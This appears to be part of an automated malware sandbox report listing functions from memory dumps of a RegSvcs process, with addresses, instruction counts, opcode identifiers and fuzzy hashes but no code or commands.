                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e78a19675608ddae663f0e93e9909b63e377827d585fb466b58f18507a0ac41
                                                                                • Instruction ID: ace11c6adca657a1862386900e100a4fe0720ae10b3dfd0b724d76b919d2582b
                                                                                • Opcode Fuzzy Hash: 9e78a19675608ddae663f0e93e9909b63e377827d585fb466b58f18507a0ac41
                                                                                • Instruction Fuzzy Hash: 6441BF32A04249DFDF01CFA8C844A9DBBB3AF46320F188556E805AB3A1D371D914EB56
                                                                                Function 00FD43DD Relevance: .1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 14aad6612ba2fc1878b2482bbdb2792f8655d6def57e4de141e83afbc0fc113e
                                                                                • Instruction ID: cd31f45edab21d02260181d8034d4da2e41fb24b6810683232e55a88256ca453
                                                                                • Opcode Fuzzy Hash: 14aad6612ba2fc1878b2482bbdb2792f8655d6def57e4de141e83afbc0fc113e
                                                                                • Instruction Fuzzy Hash: 1241F739D01248CFCB16DFB4C8444ACBBB7EF4A316718015AD858AB366C732AC46EF80
                                                                                Function 00FD3CC0 Relevance: .1, Instructions: 112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2d31ffca71c21a1c048f511abd26d290668668ef5bdccc4ca93d6a40508ee25
                                                                                • Instruction ID: 9d3edba070a69bb6a31e59819de2d26d5b1a01f2827291ffdc28282f4290041a
                                                                                • Opcode Fuzzy Hash: a2d31ffca71c21a1c048f511abd26d290668668ef5bdccc4ca93d6a40508ee25
                                                                                • Instruction Fuzzy Hash: 8731D432F0022987DB185669889437EA6E7ABC4320F1C403BDA02D7384DF75CE05AB52
                                                                                Function 00FD8EF8 Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2da03e142e6e87b1f1665c0e1e8c10dc02ed5e23c1cc17ec0d547968736a9024
                                                                                • Instruction ID: 36e20c9f061216bc570381480dd1cb94e4d47bafbed463401bb65932ecc11c88
                                                                                • Opcode Fuzzy Hash: 2da03e142e6e87b1f1665c0e1e8c10dc02ed5e23c1cc17ec0d547968736a9024
                                                                                • Instruction Fuzzy Hash: 4B31B7317041518FCB268B79D85463E7B67BF84790B2C4957E012DB392EF24CC46E755
                                                                                Function 00FD5658 Relevance: .1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7de9a26684316681a64032267e3923e118ab9c08b934801a34513959dd3a5271
                                                                                • Instruction ID: bbec7cbaa2367ecc78f806ae4fe5cbfeffefd8f9a6083e97d7690bee5bfd4b4b
                                                                                • Opcode Fuzzy Hash: 7de9a26684316681a64032267e3923e118ab9c08b934801a34513959dd3a5271
                                                                                • Instruction Fuzzy Hash: C7317C31A011099FCF019F68D854AAF7BA3EF48710F14846AF9158B394CB39CD61EB91
                                                                                Function 00FD8370 Relevance: .1, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a98e61a182788edc16ee08bd6457b78daa94a87ca7a6b7866bf55951b4c30046
                                                                                • Instruction ID: fe4b220a42441962608d62c22939a23f412852aae52494835dd990e773b7ace1
                                                                                • Opcode Fuzzy Hash: a98e61a182788edc16ee08bd6457b78daa94a87ca7a6b7866bf55951b4c30046
                                                                                • Instruction Fuzzy Hash: 4121F471B002428BDB169679985463E3A979FD67A9B1C807BD902CB398DE75CC03B382
                                                                                Function 00FD8380 Relevance: .1, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3b625fe7cebc815092cccd25deae31441cdf44ea627cf975b9c99f21f3a93a6
                                                                                • Instruction ID: abc98ce278e3ca79a88fd25c16f9c5f7c9ccf33f755794960e43cb9bc2b70944
                                                                                • Opcode Fuzzy Hash: a3b625fe7cebc815092cccd25deae31441cdf44ea627cf975b9c99f21f3a93a6
                                                                                • Instruction Fuzzy Hash: 56218371B0014287DB159A69D85473E3697AFD67A9F28C03AD902CB798DEB5CC43B381
                                                                                Function 00FD62F0 Relevance: .1, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21327b664fbb089374fd2a0c4e1403fa69392b54ae30b5fdc2466160ce786480
                                                                                • Instruction ID: 7d8b5237bca10b7d968c077625600686dbd5cf52fa8284d11b2010b829d12eb2
                                                                                • Opcode Fuzzy Hash: 21327b664fbb089374fd2a0c4e1403fa69392b54ae30b5fdc2466160ce786480
                                                                                • Instruction Fuzzy Hash: 6921F335B016118FC7159B29D854A3FB7A3EFC976171985BAE806CB394CF34DC028B80
                                                                                Function 00FD28F0 Relevance: .1, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ea8be8e527125d5266e53f53eed29e1f79055cef4cb4e1eec3a9bdfc0eef9af1
                                                                                • Instruction ID: 78a936256afd5999f3cfe0ab0e3d6b2ead02ba3ec48286d8934aba40e769803f
                                                                                • Opcode Fuzzy Hash: ea8be8e527125d5266e53f53eed29e1f79055cef4cb4e1eec3a9bdfc0eef9af1
                                                                                • Instruction Fuzzy Hash: 1721A435A00115AFCB54DB24C8509AE77B9EBAD360F54C45AD8199B340DB31EE42DBD2
                                                                                Function 00B7D044 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794416203.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_b7d000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 252966e77fa9e64966a2a52d4772a33834526863c6be9485beb90059ce6a080d
                                                                                • Instruction ID: b84adf0ecfed8d96d0388261d0f006666c4fbf96c30e021366741a3802d64d1d
                                                                                • Opcode Fuzzy Hash: 252966e77fa9e64966a2a52d4772a33834526863c6be9485beb90059ce6a080d
                                                                                • Instruction Fuzzy Hash: FC212271504204EFDB10DF24C9D0B26BBB1FF84354F24C5ADE84E4B292C73AD846CA61
                                                                                Function 00FD5649 Relevance: .1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 148e5578423b4b4862d7f8fea1b29139405920a0ea841ae1154821e902425e24
                                                                                • Instruction ID: 125c5bde76ce34782a3e1e1523dcab9a3beffa9b45cd6e7b1eac2c8334bb4bd3
                                                                                • Opcode Fuzzy Hash: 148e5578423b4b4862d7f8fea1b29139405920a0ea841ae1154821e902425e24
                                                                                • Instruction Fuzzy Hash: 8F21D131B061489FCB01AF68D4447AF3BF2EF59720F14806AF8058B345DA38CE55DB91
                                                                                Function 00FD4285 Relevance: .1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab1462feb9f5608b2204b62d1a9bec8f68a1f015c22f21671f35fc6aa62d8aec
                                                                                • Instruction ID: fe4225464677ce45acdc65f880c5bf4d646a1c17fe9aeac01e0f05d6da2861b6
                                                                                • Opcode Fuzzy Hash: ab1462feb9f5608b2204b62d1a9bec8f68a1f015c22f21671f35fc6aa62d8aec
                                                                                • Instruction Fuzzy Hash: D431B579E01248CFCB04DFA8D5948ADBBB6FF49311B208469E819AB365DB35AC45CF40
                                                                                Function 00FD9761 Relevance: .1, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 58509a8a9e313d220694d43719dd87739409ce3d110c1c721112b3305d7d3e76
                                                                                • Instruction ID: 38dfccd43ad8411ecc2f09c68a70bc6c8114f9e1addd601df9bff5d5320a2a64
                                                                                • Opcode Fuzzy Hash: 58509a8a9e313d220694d43719dd87739409ce3d110c1c721112b3305d7d3e76
                                                                                • Instruction Fuzzy Hash: 6A217A30E052599FCB15CFA5D450AEEBFB6AF49310F28806AE410E6394DB349941EF20
                                                                                Function 00FDF640 Relevance: .1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a2fe6291b6e3a43de246895511e71c0d63dbc623b65ed469cda6fde71a487326
                                                                                • Instruction ID: 47b3655194dd4bb439de93039a856777341d68789c211ba74f99c1bb3b977cd1
                                                                                • Opcode Fuzzy Hash: a2fe6291b6e3a43de246895511e71c0d63dbc623b65ed469cda6fde71a487326
                                                                                • Instruction Fuzzy Hash: 8B214C70D0020A9FEB00EFB8D950B5EBFF2EB44304F04C5AAD1089B265EB345A459B91
                                                                                Function 00FD6300 Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 653aa4bf94d8b84a9b73e5157d968dd7733fac78dbe3a6738eb1d6b0840c260a
                                                                                • Instruction ID: 6b10ddb6328fe356a321e01c47e33f7a9b9c0df825a6ff2d05256afe54cb6686
                                                                                • Opcode Fuzzy Hash: 653aa4bf94d8b84a9b73e5157d968dd7733fac78dbe3a6738eb1d6b0840c260a
                                                                                • Instruction Fuzzy Hash: 4811A135B016119FC7195B2AD454A3EB7A7EF897613194479E806CB350CF31DC029790
                                                                                Function 00FD27F0 Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63f934a99df5c27505cff71db7d0cd3ef51fbf88b9a75e8aa7413a7d8c4a27c2
                                                                                • Instruction ID: 502169f83ed24f0dcaf37bc391563538384bc95f62c7ec55a33f6f0bd4cc1e29
                                                                                • Opcode Fuzzy Hash: 63f934a99df5c27505cff71db7d0cd3ef51fbf88b9a75e8aa7413a7d8c4a27c2
                                                                                • Instruction Fuzzy Hash: 6D2103B4D04249CFCB00EFA8D9546EEBFF4BF59301F14456AD809B7210EB305A95CBA6
                                                                                Function 00FDF650 Relevance: .1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 89791792f06fc8b064ab0ae2c41dee1d7c00c00f10df7f612dffc9cb1d9bbd65
                                                                                • Instruction ID: db2b6955dbf2eb94dfe04a51b2e3609a095af0669aa5bc32f0e5fe978642c538
                                                                                • Opcode Fuzzy Hash: 89791792f06fc8b064ab0ae2c41dee1d7c00c00f10df7f612dffc9cb1d9bbd65
                                                                                • Instruction Fuzzy Hash: CC112930D0020ADFEB00EFB8D951B9EBBF2EB84304F04C5A9D0089B265EB345A499B91
                                                                                Function 00FDEB65 Relevance: .1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: edf28e4ab2ae5226a13ec9e205813f287edc236f59ce7ab182d25a21754a3c1c
                                                                                • Instruction ID: ca58152fa9c281ec0e8430b8071b255b34f176fcbcc092830af0107b8e68e835
                                                                                • Opcode Fuzzy Hash: edf28e4ab2ae5226a13ec9e205813f287edc236f59ce7ab182d25a21754a3c1c
                                                                                • Instruction Fuzzy Hash: 40214E74D10229CFDB64DF68D994B9DBBB1BF49304F1090AAD409AB361DB34AD85DF40
                                                                                Function 00FD5E98 Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 34b85494a169d4270d6b6ef7c186f8bffbe65bd97c73aeacabd12845a6c25b03
                                                                                • Instruction ID: e448216a01c301c36a26e4298fca1c1a846588d569d4aa7fcb2fc220a81ec629
                                                                                • Opcode Fuzzy Hash: 34b85494a169d4270d6b6ef7c186f8bffbe65bd97c73aeacabd12845a6c25b03
                                                                                • Instruction Fuzzy Hash: 6D01B532B04214AFCB119EA99810AAF3BABDFC9B50B1C8067F905DB385D975CE15A7D0
                                                                                Function 00B7D03F Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794416203.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_b7d000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae9d72851915523878f16b9cd24c13245b133e2210c8b1622926dc5e3fa9d021
                                                                                • Instruction ID: 4ab14a627462d4541b1d06016d85cc8fba6231a3d80ce12b5d7762af13120b6f
                                                                                • Opcode Fuzzy Hash: ae9d72851915523878f16b9cd24c13245b133e2210c8b1622926dc5e3fa9d021
                                                                                • Instruction Fuzzy Hash: 49118B75504284DFCB15CF14D9D4B15BBB2FB84314F28C6A9E8494B656C33AD84ACF62
                                                                                Function 00FDE8E8 Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0e50ac2f8c25f6d230210e261f757b2b0d67f0e37cadf10c0b36100ac8c18063
                                                                                • Instruction ID: 4020bd7c685b0033462f178616f123da45b9c7b491de8e2fdf12dbf10639410c
                                                                                • Opcode Fuzzy Hash: 0e50ac2f8c25f6d230210e261f757b2b0d67f0e37cadf10c0b36100ac8c18063
                                                                                • Instruction Fuzzy Hash: C7119E78D0034AEFDF00DFA8D844AAEBBB1FB89300F108066D914A7354D7356A41DF91
                                                                                Function 00FDABE0 Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: edde18aa461cabf271816d136468feaff12ad60debe1471e5ed84f036a1c3558
                                                                                • Instruction ID: 11809d51b0a9f2befac309f75b4c2a37191b9194f9bddc768d8be7e840c5f4ca
                                                                                • Opcode Fuzzy Hash: edde18aa461cabf271816d136468feaff12ad60debe1471e5ed84f036a1c3558
                                                                                • Instruction Fuzzy Hash: 41F0F031B106104B87256A3E9854A2AB6EFEFC8B7131D847BE905CB361EE21CC038386
                                                                                Function 00FD9C11 Relevance: .0, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9bf81945789eb7de5cac4bdfbade24fab8b0d66a3a847368fd51a5cb99fda287
                                                                                • Instruction ID: d3aa095a897814e5e2feec7737538474277f2df7ba8add728a4725c6b2c441b9
                                                                                • Opcode Fuzzy Hash: 9bf81945789eb7de5cac4bdfbade24fab8b0d66a3a847368fd51a5cb99fda287
                                                                                • Instruction Fuzzy Hash: ADF0E272A0D3C5AFDF139B9084442ACFFB2DF52321F1980DBD5808B262C3744A89D751
                                                                                Function 00FD8EEB Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4640c1f9842037d0db26c351720eda238f166078a9d5e56ce1664ee27a87557d
                                                                                • Instruction ID: 9fac8014f2d0c5354ad648261bc7b6ac0bea9485267f2d1487cb04e445bb65f0
                                                                                • Opcode Fuzzy Hash: 4640c1f9842037d0db26c351720eda238f166078a9d5e56ce1664ee27a87557d
                                                                                • Instruction Fuzzy Hash: E2D02E6300C2642EE722010E3C81A932F0EC2C23B0B2A01A7F528E32029C414C4262B4
                                                                                Function 00FD28A1 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e669fff3b11999b1253fb121837dedceddea9821c8b82edf2f632454db99655
                                                                                • Instruction ID: 3a10707e642cefafaf56dc37553872e000714f33a5b53bede8a9b0d96233b647
                                                                                • Opcode Fuzzy Hash: 5e669fff3b11999b1253fb121837dedceddea9821c8b82edf2f632454db99655
                                                                                • Instruction Fuzzy Hash: EFE02676D206A6CBCB02E7B19C500EEF738BDE2212B58465BC06272081FB30121AC7A1
                                                                                Function 00FD6739 Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f27ae6ebcd4b5f874169219751e6fa2ce85426806a3516ed5db303ca481a837
                                                                                • Instruction ID: d8289c5eaf4fdb99017fe8ec1b2f7f9b39c633cc0e4cc3cd601a26be0f70be66
                                                                                • Opcode Fuzzy Hash: 1f27ae6ebcd4b5f874169219751e6fa2ce85426806a3516ed5db303ca481a837
                                                                                • Instruction Fuzzy Hash: F1E0C23501834E8ACB02B778BC5A2583F5BA9A231C71C86A7D004CE25BDE796A1587A0
                                                                                Function 00FD28B0 Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a8dc3f913fb2443c907767535392ebae99f29d9172c6dd89fe6111874514c11
                                                                                • Instruction ID: 7646d466cd161bf72352935b2ba85b02f33d58e5121708f48fef7e778f0d09b8
                                                                                • Opcode Fuzzy Hash: 7a8dc3f913fb2443c907767535392ebae99f29d9172c6dd89fe6111874514c11
                                                                                • Instruction Fuzzy Hash: 41D01732D202AA978B04A6A6DC048EEF73DEE96221B908626D52437140EB706669C7E1
                                                                                Function 00FDD6D4 Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 15d9bdbe8da6956bda306f9f933ed06837fb3f41c84af04895e0c1db7fe70efa
                                                                                • Instruction ID: fe2c97a816ddda17d051fc011f4afd2ec72cf6deeb4ea0bd999512fde00b4ff6
                                                                                • Opcode Fuzzy Hash: 15d9bdbe8da6956bda306f9f933ed06837fb3f41c84af04895e0c1db7fe70efa
                                                                                • Instruction Fuzzy Hash: EBD04239E4510DCBCB30DFA8E4944DCBBB1EF49321B24942AD929A3251D6345465CF51
                                                                                Function 00FDAFAD Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 61e8bd88f9820c011cceffd339c56c34617f8417966e99b7e85d1312eedbf079
                                                                                • Instruction ID: 6b55c465a8585133626478bd0964171cd882a8946008404c9a67020908667499
                                                                                • Opcode Fuzzy Hash: 61e8bd88f9820c011cceffd339c56c34617f8417966e99b7e85d1312eedbf079
                                                                                • Instruction Fuzzy Hash: 52D0677AB40008DBCB049F99E8809DDF776FB98221B04C516E915A3260C6319935DB60
                                                                                Function 00FD6748 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4794825464.0000000000FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_fd0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b4e6c257e647bf27b9013700f2d5299b442282c62176e74ef0d7fd6f25c36e12
                                                                                • Instruction ID: 6fcd931cb0079fc5269bc8e88e6fb1318f7f7f42b436d482f2586ef65e797fba
                                                                                • Opcode Fuzzy Hash: b4e6c257e647bf27b9013700f2d5299b442282c62176e74ef0d7fd6f25c36e12
                                                                                • Instruction Fuzzy Hash: 81C0123412030A87D500BB75FC56759375AAA90704744D65591054A119DE7D5A144A84

                                                                                Non-executed Functions

                                                                                Function 061B8BA0 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.4798333836.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_61b0000_RegSvcs.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "
                                                                                • API String ID: 0-123907689
                                                                                • Opcode ID: 44eb8626801e4b5025e06b307ec9ed0b1ad2551f323bf6231c66dce84cc2e981
                                                                                • Instruction ID: dcc52424fe628f4096729c7b4b1ceaf05bfbf52e0e26be0603e5e265a33e2186
                                                                                • Opcode Fuzzy Hash: 44eb8626801e4b5025e06b307ec9ed0b1ad2551f323bf6231c66dce84cc2e981
                                                                                • Instruction Fuzzy Hash: 53F1E370E002188FEB54DFA9C484BDEFBF2AF89314F248169E448AB395D7749986CF50
                                                                                Function 061B0006 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
